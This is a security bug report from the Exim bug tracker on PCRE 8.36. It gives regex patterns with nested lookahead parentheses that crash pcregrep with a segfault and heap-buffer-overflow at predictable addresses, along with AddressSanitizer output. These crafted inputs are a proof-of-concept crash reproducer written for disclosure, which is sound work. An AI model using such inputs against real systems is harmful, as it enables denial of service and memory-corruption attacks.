http://bugs.exim.org/show_bug.cgi?id=1548
Summary: SIGSEGV at predictable addresses by adjusting the number of parentheses in a regex
Product: PCRE
Version: 8.36
Platform: Other
OS/Version: Linux
Status: NEW
Severity: security
Priority: high
Component: Code
AssignedTo: ph10@???
ReportedBy: mikispag@???
CC: pcre-dev@???
Target is compiled with ASAN, version 8.36.
$ pcregrep "(?(?=)?==)(((((((((?=)))))))))" /etc/passwd
==8224==ERROR: AddressSanitizer: SEGV on unknown address 0x60e000015ca6 (pc 0x000000550452 bp 0x7fff8037b1b0 sp 0x7fff80374320 T0)
Adding one ( ) :
$ pcregrep "(?(?=)?==)((((((((((?=))))))))))" /etc/passwd
==8429==ERROR: AddressSanitizer: SEGV on unknown address 0x60f000016c96 (pc 0x000000550452 bp 0x7fffa9643910 sp 0x7fffa963ca80 T0)
Adding (( )) again:
$ pcregrep "(?(?=)?==)((((((((((((?=))))))))))))" /etc/passwd
=================================================================
==16276==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61000000fc86 at pc 0x00000055044a bp 0x7fffe1658c70 sp 0x7fffe1658c68
READ of size 1 at 0x61000000fc86 thread T0
    #0 0x550449 in match /usr/local/google/home/mikispag/Downloads/pcre-8.36/pcre_exec.c:1410:9
    #1 0x53ba23 in pcre_exec /usr/local/google/home/mikispag/Downloads/pcre-8.36/pcre_exec.c:6923:8
    #2 0x4b947c in match_patterns /usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:1449:10
    #3 0x4ac77d in pcregrep /usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:1679:11
    #4 0x4b3661 in grep_or_recurse /usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:2293:6
    #5 0x4a50dd in main /usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:3251:13
    #6 0x7fec0c9e3ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #7 0x416ec6 in _start (/usr/bin/pcregrep+0x416ec6)
The addresses are the same for each execution.